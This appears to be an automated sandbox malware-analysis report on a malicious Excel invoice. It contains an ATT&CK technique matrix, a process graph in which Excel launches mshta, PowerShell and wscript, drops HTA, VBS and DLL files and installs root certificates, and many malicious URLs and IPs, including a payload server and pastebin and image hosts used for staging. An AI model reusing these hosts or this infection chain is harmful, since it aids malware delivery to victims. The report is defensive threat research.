            Email Collection
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts23
            Exploitation for Client Execution
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            LSASS Memory21
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell
            Logon Script (Windows)Logon Script (Windows)111
            Process Injection
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Clipboard Data
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Obfuscated Files or Information
            NTDS1
            Remote System Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Install Root Certificate
            LSA Secrets1
            File and Directory Discovery
            SSHKeylogging13
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572970 Sample: Invoice A037.xls Startdate: 11/12/2024 Architecture: WINDOWS Score: 100 102 Suricata IDS alerts for network traffic 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 Antivirus detection for URL or domain 2->106 108 17 other signatures 2->108 10 EXCEL.EXE 59 37 2->10         started        process3 dnsIp4 86 23.95.235.29, 49162, 49164, 49165 AS-COLOCROSSINGUS United States 10->86 88 short.ruksk.com 54.150.207.131, 443, 49161, 49163 AMAZON-02US United States 10->88 61 C:\Users\user\...\Invoice A037.xls (copy), Composite 10->61 dropped 63 nicewithgreatfeatu...sgivensoofar[1].hta, HTML 10->63 dropped 126 Microsoft Office drops suspicious files 10->126 15 mshta.exe 10 10->15         started        19 mshta.exe 10->19         started        21 AcroRd32.exe 28 10->21         started        file5 signatures6 process7 dnsIp8 92 short.ruksk.com 15->92 96 Suspicious command line found 15->96 98 PowerShell case anomaly found 15->98 23 cmd.exe 15->23         started        94 short.ruksk.com 19->94 26 cmd.exe 19->26         started        28 RdrCEF.exe 21->28         started        signatures9 process10 dnsIp11 118 Suspicious powershell command line found 23->118 120 Wscript starts Powershell (via cmd or directly) 23->120 122 PowerShell case anomaly found 23->122 31 powershell.exe 23 23->31         started        35 powershell.exe 26->35         started        90 192.168.2.255, 137, 138 unknown unknown 28->90 signatures12 process13 file14 65 verynicecreamychic...sforeveryonewho.vbS, Unicode 31->65 dropped 67 C:\Users\user\AppData\...\oojbmfem.cmdline, Unicode 31->67 dropped 69 verynicecreamychic...nonlinewith[1].tiff, Unicode 31->69 dropped 100 Installs new ROOT certificates 31->100 37 wscript.exe 11 31->37         started        41 csc.exe 2 31->41         started        44 wscript.exe 35->44         started        46 csc.exe 35->46         started        signatures15 process16 dnsIp17 82 paste.rs 45.63.94.214, 443, 49166, 49173 AS-CHOOPAUS United States 37->82 110 System process connects to network (likely due to code injection or exploit) 37->110 112 Suspicious powershell command line found 37->112 114 Wscript starts Powershell (via cmd or directly) 37->114 116 2 other signatures 37->116 48 powershell.exe 12 4 37->48         started        57 C:\Users\user\AppData\Local\...\oojbmfem.dll, PE32 41->57 dropped 51 cvtres.exe 41->51         started        84 paste.rs 44->84 53 powershell.exe 44->53         started        59 C:\Users\user\AppData\Local\...\otto1awr.dll, PE32 46->59 dropped 55 cvtres.exe 46->55         started        file18 signatures19 process20 dnsIp21 71 paste.ee 48->71 74 cloudinary.map.fastly.net 151.101.1.137, 443, 49168, 49174 FASTLYUS United States 48->74 76 res.cloudinary.com 48->76 78 paste.ee 53->78 80 res.cloudinary.com 53->80 signatures22 124 Connects to a pastebin service (likely for C&C) 78->124

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Invoice A037.xls19%VirustotalBrowse
            Invoice A037.xls21%ReversingLabsWin32.Exploit.Generic
            Invoice A037.xls100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            paste.rs1%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasa100%Avira URL Cloudmalware
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta6)-Q0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htasY4K0%Avira URL Cloudsafe
            https://paste.rs/ACRWCS-1-5-21-966771315-3019405637-367336477-10060%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htahttp://23.95.230%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&ki0%VirustotalBrowse
            http://go.60%Avira URL Cloudsafe
            https://paste.rs/ACRWCy0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaHC:0%Avira URL Cloudsafe
            http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFp0%Avira URL Cloudsafe
            http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF/0%Avira URL Cloudsafe
            http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFl0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaNetwkY4K0%Avira URL Cloudsafe
            https://short.ruksk.com/100%Avira URL Cloudmalware
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta20%Avira URL Cloudsafe
            http://23.95.235.29/808/verynice0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htat0%Avira URL Cloudsafe
            https://paste.rs/ACRWC0%Avira URL Cloudsafe
            http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFC:0%Avira URL Cloudsafe
            http://23.95.235.29/0%Avira URL Cloudsafe
            https://paste.rs/0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaC:0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...basa/0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...asa0%Avira URL Cloudsafe
            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...elbasa0%Avira URL Cloudsafe
            http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF0%Avira URL Cloudsafe
            https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&k100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            paste.rs
            45.63.94.214
            truetrueunknown
            paste.ee
            188.114.97.6
            truefalse
              high
              cloudinary.map.fastly.net
              151.101.1.137
              truefalse
                high
                short.ruksk.com
                54.150.207.131
                truefalse
                  high
                  res.cloudinary.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kielbasafalse
                    • Avira URL Cloud: malware
                    unknown
                    http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htatrue
                    • Avira URL Cloud: safe
                    unknown
                    https://paste.rs/ACRWCtrue
                    • Avira URL Cloud: safe
                    unknown
                    http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFtrue
                    • Avira URL Cloud: safe
                    unknown
                    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta&ronald=fine&kimshta.exe, 00000004.00000003.436007400.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.000000000046E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434003137.00000000004BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.000000000034E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://ocsp.entrust.net03mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgXpowershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Licensepowershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://contoso.com/Iconpowershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta6)-Qmshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htasY4Kmshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://paste.rs/ACRWCS-1-5-21-966771315-3019405637-367336477-1006wscript.exe, 0000001A.00000002.509713850.00000000046B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htahttp://23.95.23mshta.exe, 00000004.00000003.436100458.0000000002E65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.490780364.0000000003115000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485500603.0000000003115000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://go.6powershell.exe, 0000000F.00000002.520578292.0000000000426000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://go.microspowershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002A54000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaHC:mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFppowershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIF/powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFlpowershell.exe, 00000008.00000002.457451586.00000000004AE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C32C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498074917.00000000001E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://paste.rs/ACRWCywscript.exe, 0000001A.00000003.509150838.00000000003D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000003.509409048.00000000003D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://short.ruksk.com/mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438873247.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439302235.0000000003C2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaNetwkY4Kmshta.exe, 00000012.00000002.492270253.0000000003CED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491675537.0000000003CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://res.cloudinary.compowershell.exe, 0000000F.00000002.521154149.00000000023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002471000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta2mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436007400.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439131832.00000000004D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/808/verynicepowershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htatmshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://23.95.235.29/808/verynicecreamychickenfvouratedishesforeveryonewhoinonlinewith.tIFC:powershell.exe, 00000008.00000002.461003227.000000001C2B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.504255540.000000001C280000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://contoso.com/powershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.460373487.00000000124E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://23.95.235.29/mshta.exe, 00000004.00000003.435929278.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C83000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492452916.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491728979.0000000004964000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.483554413.0000000004964000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://paste.rs/wscript.exe, 0000000E.00000002.469658400.00000000041DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.00000000046D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaC:mshta.exe, 00000012.00000003.491244632.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003DAB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...basa/mshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...asamshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://23.95.235.29/808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta...elbasamshta.exe, 00000004.00000003.434003137.00000000004D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492043428.00000000003B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.457674292.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.521154149.00000000021D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.498637562.0000000002471000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.556031771.0000000002276000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.435929278.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438878715.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435038294.0000000003C3D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.439322100.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C28A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.461003227.000000001C2F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.467722400.0000000004218000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.469697537.000000000421B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492375272.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.485770112.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.492430617.0000000004920000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.491244632.0000000003D7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001A.00000002.509713850.000000000470C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://short.ruksk.com/wAvDWQ?&leg=fortunate&district=coherent&vibraphone=symptomatic&ronald=fine&kmshta.exe, 00000012.00000002.492043428.000000000037B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
